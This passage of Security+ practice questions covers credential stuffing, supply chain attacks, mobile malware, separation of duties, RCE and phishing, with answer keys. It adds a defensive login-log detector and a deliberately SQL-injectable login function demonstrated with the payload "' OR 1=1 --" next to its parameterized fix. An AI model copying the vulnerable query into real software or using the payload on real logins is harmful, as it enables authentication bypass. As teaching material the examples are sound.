Credential stuffing is a cyberattack that replays previously breached username and password pairs against other systems to gain unauthorized access. Attackers use automated tools to try these credentials across multiple websites or services, exploiting the common practice of password reuse. This attack targets the authentication process and relies on human behavior, particularly reused credentials, rather than software vulnerabilities. Note that the question's wording, "weak or default credentials," is broader than credential stuffing proper: guessing factory-default passwords is a separate technique, and credential stuffing is specifically the replay of leaked pairs, but it is the only credential-based attack among the options offered. Security+ candidates must understand credential stuffing because it emphasizes the importance of strong, unique passwords, multi-factor authentication, and monitoring for suspicious login attempts. Organizations can mitigate the risk by implementing rate limiting, anomaly detection (many distinct accounts attempted from one source with a high failure rate is the signature), and alerts for unusual login patterns. Credential stuffing is particularly effective against web applications and cloud services with large user bases, highlighting the need for robust authentication policies.
Phishing, the second choice, is a social engineering attack aimed at tricking users into disclosing credentials or sensitive information. Phishing relies on user interaction rather than exploiting reused credentials across multiple systems.
DDoS attacks, the third choice, overwhelm systems with traffic to make services unavailable. DDoS targets availability, not authentication or access control, and does not leverage stolen credentials.
Rootkits, the fourth choice, are stealthy malware that maintain persistent access and hide malicious activity on compromised hosts. Rootkits compromise system integrity and control, but do not exploit weak passwords or credential reuse.
The correct answer is credential stuffing because it specifically exploits reused or weak credentials to gain unauthorized access. Security+ candidates should understand attack vectors, automated attack tools, and countermeasures, including multi-factor authentication, strong password policies, and monitoring for login anomalies. Credential stuffing illustrates the importance of secure authentication practices, user education, and proactive defenses in protecting sensitive systems and accounts from compromise.
Question 55
Which type of attack targets the software supply chain to insert malicious code before it reaches end users?
A) Supply chain attack
B) Phishing
C) SQL injection
D) Worm
Answer: A) Supply chain attack
Explanation:
A supply chain attack occurs when attackers compromise software or hardware components at the source or during distribution to insert malicious code, which then reaches end users. Attackers may target development environments, third-party vendors, or update mechanisms to deliver malware as part of legitimate software. High-profile examples include attacks on software repositories or compromised update servers that affect thousands of users. Supply chain attacks compromise integrity and trust in systems, making detection challenging since the malware is embedded in trusted components. Security+ candidates must understand supply chain attacks because they demonstrate the need for secure development practices, vendor management, code signing, and verification of software integrity before deployment. Preventive measures include validating vendor security policies, performing code audits, using cryptographic signatures, and implementing monitoring for anomalies in software behavior.
Phishing, the second choice, targets end users to steal credentials or sensitive information. Phishing relies on deception rather than compromising the software distribution process.
SQL injection, the third choice, exploits web application input vulnerabilities to manipulate databases. SQL injection focuses on application-level data compromise rather than targeting the supply chain for malware insertion.
Worms, the fourth choice, are self-replicating malware that spread across networks. While worms can propagate through compromised software, they do not inherently exploit the software supply chain as their primary attack vector.
The correct answer is supply chain attack because it specifically targets the software or hardware delivery process to compromise end users. Security+ candidates should understand attack vectors, vendor assessment, secure development lifecycle practices, code signing, and monitoring strategies to detect and prevent supply chain compromises. Supply chain attacks highlight the importance of trust verification, vendor security assurance, and proactive controls to maintain integrity and prevent malicious software distribution.
Question 56
Which type of attack targets mobile devices to exploit vulnerabilities in apps or the operating system?
A) Mobile malware
B) Phishing
C) Keylogger
D) DDoS
Answer: A) Mobile malware
Explanation:
Mobile malware refers to malicious software specifically designed to target mobile devices, including smartphones and tablets. Attackers exploit vulnerabilities in mobile operating systems, poorly coded applications, or user behaviors to gain unauthorized access, steal data, or monitor activity. Mobile malware can include spyware, ransomware, banking trojans, adware, and rootkits. The consequences of mobile malware include theft of sensitive information such as contacts, credentials, and financial data, as well as device control or persistent access by attackers. Security+ candidates must understand mobile malware because mobile devices are increasingly integral to business operations and personal life, making them high-value targets. Mitigation strategies include installing apps from trusted sources, using mobile device management solutions, updating software regularly, implementing strong authentication, and educating users on safe mobile practices.
Phishing, the second choice, is a social engineering attack that can target mobile users, but it primarily relies on deception to obtain credentials rather than exploiting software vulnerabilities. Phishing attacks may complement mobile malware infections, but do not inherently target operating system or application weaknesses.
Keyloggers, the third choice, are malware programs that capture keystrokes to steal sensitive information. While keyloggers can exist on mobile devices, mobile malware encompasses a wider range of attack types, including spyware, ransomware, and trojans. Keyloggers are a subset of mobile malware, but the general category is more comprehensive in describing attacks against mobile systems.
DDoS attacks, the fourth choice, aim to overwhelm systems with traffic to disrupt availability. DDoS targets network infrastructure rather than the device itself and does not exploit mobile-specific vulnerabilities. While mobile devices can participate in DDoS attacks if compromised, they are generally victims rather than the intended target.
The correct answer is mobile malware because it specifically targets mobile devices and exploits vulnerabilities in operating systems or applications. Security+ candidates should understand the different types of mobile malware, how they propagate, and strategies for mitigation. This includes device security policies, application vetting, endpoint protection, user training, and secure mobile device management to protect sensitive information and maintain system integrity. Mobile malware emphasizes the need for a comprehensive approach to cybersecurity that considers all endpoints, including mobile platforms, which are increasingly integral to business and personal operations.
Question 57
Which security principle ensures that no single individual has complete control over critical functions?
A) Separation of duties
B) Principle of least privilege
C) Defense in depth
D) Encryption
Answer: A) Separation of duties
Explanation:
Separation of duties is a security principle that divides critical responsibilities among multiple individuals to reduce the risk of fraud, errors, or malicious actions. By ensuring that no single person has unchecked authority, organizations can prevent abuse of power, safeguard assets, and enhance accountability. Examples include separating financial approval and payment execution or splitting administrative access in IT operations. Security+ candidates must understand the separation of duties because it is a fundamental organizational control that complements technical security measures. Implementation involves defining roles and responsibilities, enforcing role-based access controls, auditing actions, and periodically reviewing assignments. Separation of duties mitigates insider threats and helps maintain compliance with regulatory requirements by reducing the potential impact of malicious or negligent actions by a single individual.
The principle of least privilege, the second choice, restricts access rights to the minimum necessary for job functions. While least privilege limits exposure to data and systems, it does not inherently enforce the division of critical responsibilities between multiple people. Least privilege and separation of duties are complementary but address different aspects of security.
Defense in depth, the third choice, is a layered security approach that combines multiple preventive, detective, and corrective controls. While defense in depth enhances overall security, it does not specifically prevent any individual from having complete control over critical functions. It focuses on mitigating threats through redundancy rather than organizational role allocation.
Encryption, the fourth choice, protects the confidentiality of data by converting it into an unreadable format without a decryption key. Encryption safeguards information but does not address the organizational or procedural risk associated with concentrated authority.
The correct answer is separation of duties because it specifically ensures that critical functions are divided among multiple individuals to prevent misuse or fraud. Security+ candidates should understand its importance in governance, risk management, and compliance, as well as its role in complementing technical security measures. Effective separation of duties supports accountability, reduces insider threat risk, and reinforces organizational security policies.
Question 58
Which type of attack exploits software vulnerabilities to execute malicious code remotely?
A) Remote code execution (RCE)
B) Phishing
C) Keylogger
D) Adware
Answer: A) Remote code execution (RCE)
Explanation:
Remote code execution is an attack in which attackers exploit software vulnerabilities to execute arbitrary code on a target system without physical access, typically over a network. RCE can result from unpatched software, misconfigured applications, or inadequate input validation; typical underlying flaws are memory corruption in native code, command or code injection (for example, passing user input to an interpreter or shell), and unsafe deserialization of attacker-controlled data. Successful RCE attacks allow attackers to gain unauthorized access, install malware, exfiltrate data, or manipulate system operations. Security+ candidates must understand RCE because it highlights the critical importance of patch management, secure coding practices, and vulnerability scanning. Mitigating RCE involves applying updates promptly, validating input, running services with least privilege so that a successful exploit gains as little as possible, employing intrusion prevention systems, and monitoring for abnormal system behavior. RCE attacks can compromise confidentiality, integrity, and availability, making them highly impactful threats.
Phishing, the second choice, is a social engineering attack designed to trick users into providing sensitive information. Phishing does not exploit software vulnerabilities directly to execute code; instead, it manipulates human behavior. While phishing may lead to malware installation, it is distinct from RCE in that it relies on user action rather than a technical flaw in software.
Keyloggers, the third choice, capture user input, including credentials and sensitive data. While keyloggers can be delivered via RCE, they are not inherently RCE attacks. Keyloggers require installation and monitoring of endpoints, whereas RCE provides attackers with direct execution control over target systems.
Adware, the fourth choice, delivers unwanted advertisements and may collect user data. Adware is generally visible and does not exploit vulnerabilities for remote execution. While adware can be distributed as part of malware campaigns, it does not inherently grant attackers control over systems like RCE does.
The correct answer is remote code execution because it specifically allows attackers to exploit software vulnerabilities to run code on a target system. Security+ candidates should understand RCE vectors, prevention techniques, and monitoring strategies to secure systems from unauthorized execution. Understanding RCE emphasizes the importance of patch management, secure application design, and continuous vulnerability assessment to protect against potentially devastating attacks that threaten confidentiality, integrity, and availability.
Question 59
Which type of attack relies on automated attempts to guess credentials across multiple sites using previously leaked data?
A) Credential stuffing
B) Brute-force
C) Phishing
D) SQL injection
Answer: A) Credential stuffing
Explanation:
Credential stuffing is an attack method where attackers use automated tools to test previously compromised username-password combinations across multiple websites or services. This attack exploits the widespread habit of password reuse, allowing attackers to gain unauthorized access without exploiting vulnerabilities in systems. Security+ candidates must understand credential stuffing because it targets authentication systems and emphasizes the importance of strong passwords, multi-factor authentication, and monitoring for unusual login patterns. Organizations mitigate credential stuffing by implementing rate limiting, anomaly detection, alerts for suspicious login activity, and enforcing unique credentials across services. Credential stuffing is highly effective due to the availability of breached credentials from previous attacks, which attackers can leverage at scale using automation.
Brute-force attacks, the second choice, attempt to guess passwords by systematically trying every possible combination. Brute-force does not rely on previously leaked credentials but instead exhausts all possibilities. While both brute-force and credential stuffing target authentication, credential stuffing is more efficient and less detectable because it uses likely valid combinations.
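The monitoring the two paragraphs above call for can be expressed as two simple log rules that separate the attack patterns: credential stuffing shows up as one source trying many different accounts once each with a low success rate, while brute force shows up as repeated failures against a single account. The Python below is an added example, not code from the original page; the log format, the sample lines and the thresholds are constructed for illustration and would be tuned to a real authentication log.

```python
"""Credential stuffing vs. single-account brute force, detected over
constructed authentication log lines (added example, not from the page)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Constructed sample log: "<timestamp> <source_ip> <username> <OK|FAIL>".
# 203.0.113.5 replays a leaked list: one attempt per account, many accounts.
# 198.51.100.7 hammers one account: classic brute force.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 203.0.113.5 alice FAIL
2024-05-01T10:00:02Z 203.0.113.5 bob FAIL
2024-05-01T10:00:02Z 203.0.113.5 carol FAIL
2024-05-01T10:00:03Z 203.0.113.5 dave OK
2024-05-01T10:00:03Z 203.0.113.5 erin FAIL
2024-05-01T10:00:04Z 203.0.113.5 frank FAIL
2024-05-01T10:00:04Z 203.0.113.5 grace FAIL
2024-05-01T10:00:05Z 203.0.113.5 heidi FAIL
2024-05-01T10:00:06Z 203.0.113.5 ivan FAIL
2024-05-01T10:00:06Z 203.0.113.5 judy FAIL
2024-05-01T10:00:07Z 203.0.113.5 mallory FAIL
2024-05-01T10:00:07Z 203.0.113.5 oscar FAIL
2024-05-01T10:05:00Z 198.51.100.7 alice FAIL
2024-05-01T10:05:20Z 198.51.100.7 alice FAIL
2024-05-01T10:05:45Z 198.51.100.7 alice FAIL
2024-05-01T10:06:10Z 198.51.100.7 alice OK
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(OK|FAIL)$")


def parse_line(line):
    """Parse one log line into a dict, or return None for malformed input."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, ip, user, outcome = m.groups()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": when, "ip": ip, "user": user, "ok": outcome == "OK"}


def _events(lines):
    """Parsed events in time order; unparsable lines are skipped."""
    evs = [e for e in (parse_line(l) for l in lines) if e is not None]
    evs.sort(key=lambda e: e["ts"])
    return evs


def _trim(window, now, seconds):
    """Drop events that fell out of the sliding window."""
    while window and (now - window[0]["ts"]).total_seconds() > seconds:
        window.popleft()


def detect_credential_stuffing(lines, window_seconds=60, min_attempts=10,
                               min_distinct_users=8, max_success_ratio=0.25):
    """Flag source IPs that try many *different* accounts in a short window
    with a low success rate. The summary lists the accounts that did succeed,
    so they can be forced through a password reset or an MFA step-up."""
    per_ip = defaultdict(deque)
    alerts = {}
    for e in _events(lines):
        window = per_ip[e["ip"]]
        window.append(e)
        _trim(window, e["ts"], window_seconds)
        users = {x["user"] for x in window}
        successes = [x["user"] for x in window if x["ok"]]
        if (len(window) >= min_attempts and len(users) >= min_distinct_users
                and len(successes) / len(window) <= max_success_ratio):
            alerts[e["ip"]] = {
                "attempts": len(window),
                "distinct_users": len(users),
                "successful_users": sorted(set(successes)),
                "window_end": e["ts"].isoformat(),
            }
    return alerts


def detect_brute_force(lines, window_seconds=300, min_failures=3):
    """Flag (ip, user) pairs with repeated failures against one account.
    The stuffing source never trips this rule: it tries each account once."""
    per_key = defaultdict(deque)
    alerts = {}
    for e in _events(lines):
        key = (e["ip"], e["user"])
        window = per_key[key]
        window.append(e)
        _trim(window, e["ts"], window_seconds)
        failures = sum(1 for x in window if not x["ok"])
        if failures >= min_failures:
            alerts[key] = failures
    return alerts


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("credential stuffing:", detect_credential_stuffing(lines))
    print("brute force:", detect_brute_force(lines))
```

On the constructed input only 203.0.113.5 matches the stuffing rule (12 attempts, 12 distinct accounts, one success, so "dave" is the account to reset), and only the 198.51.100.7/alice pair matches the brute-force rule. Per-source-IP keying is the weak point of the stuffing rule: traffic behind a large NAT or proxy pool can look like stuffing, and an attacker spreading attempts across many addresses will stay under the threshold, which is why the page pairs monitoring with rate limiting and multi-factor authentication rather than relying on detection alone.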
Phishing is a form of social engineering that primarily targets human behavior rather than technical vulnerabilities. Its main objective is to deceive users into voluntarily providing sensitive information, most commonly login credentials, personal identification, or financial data. Attackers often craft messages that appear to come from trusted sources, such as banks, online services, or internal company communications. These messages can be delivered through email, text messages, social media, or other communication channels. Unlike automated attacks, phishing relies heavily on user interaction and psychological manipulation. The success of a phishing attempt depends on the attacker convincing the target that the message is legitimate and prompting them to take a specific action, such as clicking a link, downloading an attachment, or entering information into a fake website. Because it relies on the user’s actions, phishing is not inherently an automated process, and it does not systematically attempt credential reuse across multiple sites. Instead, phishing campaigns may be carefully targeted or distributed broadly, but the immediate goal is to acquire credentials through deception rather than automation.
Although phishing itself is not an automated attack, the credentials obtained from a successful phishing attempt can be used in automated campaigns. For example, attackers may take stolen usernames and passwords and attempt to access multiple online services in what is known as credential stuffing. In credential stuffing, attackers exploit the common tendency of users to reuse passwords across different platforms, automating login attempts on various websites. However, it is important to note that phishing is the method of initial credential acquisition and not the automated process of testing those credentials. Phishing sets the stage for credential stuffing but does not itself perform automated attempts across multiple accounts.
SQL injection, on the other hand, is a technical attack that exploits vulnerabilities in web application input validation. When web applications fail to properly sanitize user input, attackers can insert malicious SQL commands into input fields such as login forms, search boxes, or URL parameters. These commands are executed by the backend database, potentially allowing attackers to read, modify, or delete data, execute administrative operations, or compromise the integrity of the system. The primary objective of SQL injection is data compromise and manipulation rather than acquiring credentials for use in other services. While SQL injection can be used to access sensitive login information stored in a database, it is not designed as a credential reuse attack and does not inherently involve automated login attempts across multiple sites. Its scope is generally limited to the target application and the database it interacts with, focusing on exploiting technical flaws rather than social engineering.
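The "login form" case in the paragraph above is easiest to see with the flawed query next to its fix. The Python below is an added example, not code from the original page: it uses an in-memory SQLite database with one constructed account, and SHA-256 stands in for a proper password hash only to keep the example dependency-free. The first function builds the query by string formatting, so whatever the user types is parsed as SQL; the second passes the same values as bound parameters, so they can only ever be compared as data.

```python
"""A string-built login query beside its parameterized replacement,
run against an in-memory SQLite table (added example, not from the page)."""
import hashlib
import re
import sqlite3

# Defense in depth: an allowlist for the username field, applied before the
# query so malformed input is rejected early. Parameterization is the fix;
# validation narrows what reaches the database at all.
USERNAME_RE = re.compile(r"^[a-z0-9_.-]{1,32}$")


def make_db():
    """Create the constructed sample table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("alice", _hash("correct horse")))
    conn.commit()
    return conn


def _hash(password):
    # Stand-in for bcrypt/Argon2; only here to keep the example self-contained.
    return hashlib.sha256(password.encode()).hexdigest()


def login_vulnerable(conn, username, password):
    """Vulnerable: the username is spliced into the SQL text, so a value
    containing a quote and a comment marker rewrites the WHERE clause."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND pw_hash = '{_hash(password)}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Fixed: placeholders bind the values; the query's shape cannot change."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, _hash(password)),
    ).fetchone()
    return row is not None


def valid_username(username):
    """Allowlist check for the username field (defense in depth)."""
    return USERNAME_RE.match(username) is not None


if __name__ == "__main__":
    conn = make_db()
    hostile = "' OR 1=1 --"   # classic textbook input from a Security+ guide
    print("vulnerable, hostile input:", login_vulnerable(conn, hostile, "x"))
    print("parameterized, same input:", login_safe(conn, hostile, "x"))
    print("allowlist accepts it?     ", valid_username(hostile))
```

Against the constructed table, the vulnerable function returns true for the hostile username with any password, because the comment marker discards the password comparison entirely; the parameterized function returns false for the same input, since SQLite now looks for an account literally named `' OR 1=1 --`. The allowlist rejects it before a query is ever run. Note that hashing the password does nothing here: the injection lives in the username, which is why the page treats input handling and query construction, not credential strength, as the SQL injection control.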
Phishing and SQL injection are therefore different kinds of attack. Phishing is social engineering: it depends on deceiving users into revealing information rather than on a software flaw, and it is not automated, even though credentials it yields may later feed an automated attack such as credential stuffing. SQL injection is a technical attack on improper input validation in web applications, used to manipulate databases and compromise data integrity; it neither reuses credentials across sites nor depends on user deception. Defending against the two requires addressing very different weaknesses, human in one case and technical in the other.
The correct answer is credential stuffing because it specifically leverages automated testing of previously leaked credentials across multiple platforms. Security+ candidates should understand attack mechanisms, mitigation strategies, and the role of multi-factor authentication in reducing risk. Credential stuffing highlights the need for password uniqueness, monitoring, and proactive response to prevent account compromise across multiple services.
Question 60
Which type of attack combines social engineering with malicious links or attachments to compromise users?
A) Phishing
B) Worm
C) Rootkit
D) Denial of Service (DoS)
Answer: A) Phishing
Explanation:
Phishing is a social engineering attack in which attackers deceive users into revealing sensitive information or credentials, or into downloading malicious software. Phishing campaigns often use email, instant messaging, or social media to deliver links to fake websites or attachments containing malware. Attackers rely on human trust and a lack of awareness rather than on exploiting technical vulnerabilities directly. Security+ candidates must understand phishing because it is among the most prevalent attack types, highlighting the importance of user education, email filtering, endpoint protection, and multi-factor authentication. Successful phishing can result in credential theft, identity compromise, financial loss, or access to organizational networks, and it often serves as the initial step in more complex attacks such as ransomware deployment, data exfiltration, or lateral movement within networks.
Worms, the second choice, are self-replicating malware that spreads automatically across networks. Worms do not rely on social engineering; they propagate through system vulnerabilities or automated mechanisms rather than tricking users into clicking malicious links.
Rootkits are a type of malicious software specifically designed for stealth and persistence on a compromised system. Unlike more overt forms of malware, rootkits aim to hide their presence and maintain long-term access without being detected by users or security tools. They often operate at a deep level in the system, sometimes within the operating system kernel or even in firmware, giving them the ability to intercept system calls, hide processes, files, and network connections, and control system behavior. The primary goal of a rootkit is not immediate disruption or direct data theft but to create a hidden foothold for attackers. Once installed, a rootkit allows an attacker to maintain elevated privileges and potentially install additional malware, monitor system activity, or exfiltrate sensitive data over time. Rootkits are typically installed through other forms of malware, direct exploitation of vulnerabilities, or unauthorized access, but they do not inherently rely on social engineering, phishing, or deceptive emails to propagate. Their defining characteristic is covert control, making detection and removal extremely difficult, and giving attackers long-term, stealthy access to the system.
In contrast, denial of service attacks focus on disrupting the availability of systems, networks, or services. DoS attacks aim to make resources inaccessible to legitimate users by overwhelming servers, applications, or network infrastructure with excessive traffic or requests. The methodology can vary from simple floods of network packets to more sophisticated resource exhaustion techniques. Distributed denial of service attacks amplify this effect by using multiple compromised machines to generate traffic simultaneously, increasing the scale of disruption. Unlike rootkits, DoS attacks do not target the confidentiality or integrity of data. They do not aim to steal information or maintain hidden control over a system. Similarly, DoS attacks do not rely on social engineering or tricking users into performing certain actions. The focus is entirely on exhausting system resources to interrupt service availability.
While rootkits and denial of service attacks are both forms of malicious activity, they operate in fundamentally different domains and have distinct objectives. Rootkits prioritize stealth, persistence, and control, often remaining undetected for long periods and providing a platform for further attacks. In contrast, DoS attacks are overt and immediate, designed to cause disruption and make systems unavailable, without concern for hiding the attack or maintaining access. A rootkit may, in some cases, be used to facilitate a DoS attack by controlling compromised machines to generate traffic, but the rootkit itself is not inherently disruptive. Its main role is to maintain undetected access and enable long-term manipulation or surveillance.
Understanding the distinction between these types of attacks is critical for cybersecurity defenses. Defending against rootkits requires techniques focused on the detection of hidden processes, integrity verification of critical system files, and monitoring for unusual behavior that may indicate unauthorized control. On the other hand, mitigating DoS attacks involves strategies to handle traffic spikes, filter malicious requests, and maintain service availability even under attack. While both represent serious threats, their nature, goals, and methods are very different.
Neither distractor fits the question. Rootkits provide persistent, hidden access and control over a compromised system without relying on social engineering; denial of service attacks disrupt availability by overwhelming systems or networks with traffic, aiming at resource exhaustion rather than data compromise or deception.
The correct answer is phishing because it specifically combines social engineering with malicious content to compromise users. Security+ candidates should understand phishing methods, recognition strategies, mitigation techniques, and organizational training programs. Phishing demonstrates the critical need for user awareness, layered defenses, and proactive monitoring to prevent credential theft and broader system compromise.